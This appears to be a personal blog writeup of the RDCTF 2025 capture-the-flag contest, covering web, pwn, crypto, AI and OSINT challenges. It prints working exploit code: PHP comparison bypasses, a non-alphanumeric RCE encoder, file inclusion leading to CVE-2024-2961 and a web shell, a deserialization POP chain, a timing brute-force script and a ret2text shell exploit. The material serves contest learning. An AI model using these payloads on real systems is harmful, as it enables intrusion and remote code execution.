RDCTF_wp

Web

Web has a check-in challenge too

Open the site:

![image](RDCTF-wp/image 2.png)

Ctrl+U to view the page source; it contains ZmxhZ3swZWZhOTk0ODRiZjVlZGQ3YzE5OGU4M2FjYjQ5ZWJkMn0=

Decode it (base64) on Linux:

![image](RDCTF-wp/image 1.png)

flag{0efa99484bf5edd7c198e83acb49ebd2}

It's actually a Warmup?

Page source:

![image](RDCTF-wp/image 2 2.png)

level-1: MD5 loose comparison (==). Any two strings whose MD5 digests start with 0e (followed only by digits) will do, because PHP compares such numeric strings as 0 under ==.

![image](RDCTF-wp/image 3.png)

?NLhead=s878926199a&NLhand=s155964671a
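As an added example (not part of the writeup), the two payload strings above run through PHP's loose, strict and constant-time comparisons, followed by a hardened version of the level-1 check; the function names and the shape of the original check are assumptions:

```php
<?php
// Added example, not from the writeup: why the level-1 check is bypassable
// and how to harden it. The two inputs are the ones used in the payload above.
$head = 's878926199a';
$hand = 's155964671a';

// Both digests have the form "0e" followed only by decimal digits, so PHP
// parses each as a numeric string equal to 0.0 when compared loosely (==).
$h1 = md5($head);
$h2 = md5($hand);

var_dump($h1 == $h2);            // loose comparison: numeric, both 0.0
var_dump($h1 === $h2);           // strict comparison: compares the bytes
var_dump(hash_equals($h1, $h2)); // strict and constant-time

// Illustrative names. weak_check() is the assumed shape of the check the
// level-1 payload abuses; strict_check() is the hardened form.
function weak_check(string $a, string $b): bool {
    return $a != $b && md5($a) == md5($b);
}
function strict_check(string $a, string $b): bool {
    return $a !== $b && hash_equals(md5($a), md5($b));
}
var_dump(weak_check($head, $hand));
var_dump(strict_check($head, $hand));
```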

level-2: newline bypass

![image](RDCTF-wp/image 4.png)

?NLhead=s878926199a&NLhand=s155964671a&Nai[Long.body=fat%0a

level-3: RCE without alphanumeric characters (bitwise-NOT encoding); just run the script

```php
<?php
// Run from the command line
/* author yu22x */
// Builds a (~function)(~command); payload with both strings bitwise-NOT encoded
fwrite(STDOUT, '[+]your function: ');
$system = str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT, '[+]your command: ');
$command = str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~' . urlencode(~$system) . ')(~' . urlencode(~$command) . ');';
```

![image](RDCTF-wp/image 5.png)

![image](RDCTF-wp/image 6.png)

flag: RDCTF{7h1s-1s-0-f10g-1m-0-NL}

Where is nailong

Open the site and visit nailong.php

![image](RDCTF-wp/image 7.png)

The error message shows that the file parameter is taken via POST; read the source of nailong.php through a PHP stream wrapper

![image](RDCTF-wp/image 8.png)

Decode with CyberChef

![image](RDCTF-wp/image 9.png)

It is a simple file inclusion vulnerability; try reading /flag

![image](RDCTF-wp/image 10.png)

![image](RDCTF-wp/image 11.png)

After decoding, visit 真奶龙.php and read its source

![image](RDCTF-wp/image 12.png)

![image](RDCTF-wp/image 13.png)

Following the hint about a CVE, a search turns up CVE-2024-2961; analysis and reproduction: https://cloud.tencent.com/developer/article/2429454

The ready-made script is at https://github.com/ambionics/cnext-exploits

![image](RDCTF-wp/image 14.png)

Once it succeeds, visit shell.php

flag{61b012fb-dbe9-4c1c-8646-d1538fa6681e}

frank1q22 is here with gifts

The first step is an original BaseCTF 2024 challenge.

The first if is bypassed with the data:// wrapper:

data://text/plain,frank1q22

![image](RDCTF-wp/image 15.png)

The second if is cut off with @

![image](RDCTF-wp/image 16.png)

Visit nlrce.php

![image](RDCTF-wp/image 17.png)

A lot is filtered and there is no outbound network access; used a small trick I had seen before

![image](RDCTF-wp/image 18.png)

flag{00acf3a5-7962-4ab4-b890-0e3b362b7cb7}

wc, it's PHP

![image](RDCTF-wp/image 19.png)

Brute force with a script:

```python
import requests

url = 'http://ctf.wdsec.com.cn:32913/frank1q22-levelLEVEL1.php'

passwd = '65510000'
tables = '0123456789'

# Time-based brute force, one digit at a time: the response delay grows
# with every correct digit, so a delay of at least i seconds confirms digit i.
for i in range(1, 9):
    for j in tables:
        passwd = passwd[:i - 1] + j + passwd[i:]
        r = requests.post(url, data={'pass': passwd})
        if 'The final' in r.text:
            print(r.text)
            exit(0)
        if r.elapsed.total_seconds() >= i:
            print("digit {} is {}".format(i, j))
            break
```

![image](RDCTF-wp/image 20.png)

Next visit FRANK1Q22-LEVELlevel2.php

![image](RDCTF-wp/image 21.png)

Command execution through preg_match

flag{49bfdb7c-b3c4-411f-8709-8e0c143ec33b}

Hard_pop

A fairly hard challenge to bypass: a PHP stream wrapper combined with the "exit();" death bypass (死亡绕过).

exp:

```php
<?php
class wing{
    public $k3nt0n = "php://filter/string.strip_tags/?>php_value auto_prepend_file /flag\0a\23/resource=.htaccess";
    public function __call($name, $arguments){
        if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->k3nt0n)){
            die('Maybe try one more time,she\'ll be back.Go & Get Her.');
        }
        echo "You'll Be Success";
        file_put_contents($this->k3nt0n,"<?php exit();".$this->k3nt0n);
        echo "perfect!";
    }
}

class loves{
    public $sivan = "data://text/plain,Welcome To RDCTF 2025";
    public $wx;
    public function __destruct(){
        if(isset($this->sivan)&&file_get_contents($this->sivan)=='Welcome To RDCTF 2025'){
            echo "Passed~";
            $this->wx->source;
        }
    }
    public function __invoke()
    {
        echo $this->wx;
    }
}

class WX{
    public $POP;
    public function __get($name){
        $Challenge = $this->POP;
        return $Challenge();
    }

    public function __toString(){
        $this->POP->CanIGetYourHeart();
        return "Soon~";
    }
}

// POP chain: loves::__destruct -> WX::__get -> loves::__invoke -> WX::__toString -> wing::__call
$a = new loves();
$a->wx = new WX();
$a->wx->POP = new loves();
$a->wx->POP->wx = new WX();
$a->wx->POP->wx->POP = new wing();
echo serialize($a);
?>
```

It has to be sent several times before the flag appears.

PWN

The painless road to Pwn

When I reproduced this the remote was no longer reachable, so I just attacked it locally.

![image](RDCTF-wp/image 22.png)

Just send:

```python
payload = b"\x01\x02\x03\x04"
```

![image](RDCTF-wp/image 23.png)

You can see that the cat flag command has already been executed; it's through.

ret2text

A simple ret2text; check the protections:

![image](RDCTF-wp/image 24.png)

Only NX (non-executable stack) is enabled, 64-bit binary; open it in IDA

![image](RDCTF-wp/image 25.png)

Decompiled main: an obvious stack overflow in read. offset = 0x20 + 0x8

Looking around turns up a backdoor function

![image](RDCTF-wp/image 26.png)

It is at address 0x4011B7; because the 64-bit binary needs stack alignment, backdoor = 0x4011B7 + 1

Final exp:

```python
from pwn import *

context(os="linux", arch='amd64', log_level="debug")
sh = remote("ctf.wdsec.com.cn", 32935)
# sh = process("./ret2text")

backdoor = 0x4011B7 + 1   # skip one byte to keep the stack 16-byte aligned
offset = 0x20 + 0x8       # buffer size plus saved rbp
payload = b'A' * offset + p64(backdoor)
sh.sendlineafter(b'please input:\n', payload)
sh.interactive()
```

Got a shell

![image](RDCTF-wp/image 27.png)

flag{f7cd5ac9-d515-49b6-bb4d-c2258ed60443}

Crypto

Hello_Crypto

Solved in one shot with Claude

```python
from Crypto.Cipher import AES
import binascii

# Ciphertext
ciphertext = binascii.unhexlify('26a8191576aa59308f9ff3469bebbd0c8d27820531130dfe1a860e1e7b02bd7495f56b3d3d5e9a12c01c4f853693e16c')

# Key and IV
key = binascii.unhexlify('1234567890abcdef1234567890abcdef')
iv = binascii.unhexlify('1234567890abcdef1234567890abcdef')

# Create the AES-CBC decryptor
cipher = AES.new(key, AES.MODE_CBC, iv)

# Decrypt
plaintext = cipher.decrypt(ciphertext)

# Output
print("Decrypted (hex):", binascii.hexlify(plaintext).decode())
print("Decrypted (ascii):", plaintext.decode('ascii', errors='ignore'))
```

This gives ZmxhZ3tXM2xjMG0zX1QwX1RIM19DcnlwVDBfVzBybGR9

base64 decode:

flag{W3lc0m3_T0_TH3_CrypT0_W0rld}

Login

Solved in one shot with DeepSeek

```python
from Crypto.Util.number import *

# Known data
c = "byqo{A31k0kl_m0_YODPS}"
fake_key = "76e6f6c69616e6968637f677"

# Recover the key
key_hex = fake_key[::-1]            # reverse fake_key
key_bytes = bytes.fromhex(key_hex)  # convert to bytes
key = key_bytes.decode()            # decode to a string
print(f"Recovered key: {key}")

# Alphabets
alpha1 = 'abcdefghijklmnopqrstuvwxyz'
alpha2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

# Convert the key to a list of numbers
key_nums = []
for i in key:
    if i in alpha1:
        key_nums.append(alpha1.find(i))
    elif i in alpha2:
        key_nums.append(alpha2.find(i))

# Decryption function
def decrypt(ciphertext, key_nums):
    pointer = 0
    plaintext = ''
    for i in ciphertext:
        if i in alpha1:
            # XOR with pointer to get new_index
            new_index = alpha1.find(i) ^ pointer
            # subtract key_nums[pointer] and reduce mod 26
            original_index = (new_index - key_nums[pointer]) % 26
            plaintext += alpha1[original_index]
            pointer = (pointer + 1) % len(key_nums)
        elif i in alpha2:
            # XOR with pointer to get new_index
            new_index = alpha2.find(i) ^ pointer
            # subtract key_nums[pointer] and reduce mod 26
            original_index = (new_index - key_nums[pointer]) % 26
            plaintext += alpha2[original_index]
            pointer = (pointer + 1) % len(key_nums)
        else:
            plaintext += i
    return plaintext

# Decrypt
flag = decrypt(c, key_nums)
print(f"Decrypted flag: {flag}")
```

flag{W31c0me_t0_RDCTF}

AI

Cat food

Enter: where is flag

RDCTF{Y0u_L1e_Th3_41_7d257664eaa4}

OSINT

Geo-location ①

The statue of Marshal Zhukov. In the end it seemed the map had to be zoomed out a little before the coordinates obtained were correct.

I'm no longer sure whether this is right; it was too long ago.

flag{d0ed18d3d8fc0cf3aac3d8339c8dd86f}


http://st3r665.github.io/2025/03/04/RDCTF-wp/
Author: St3r
Published: 4 March 2025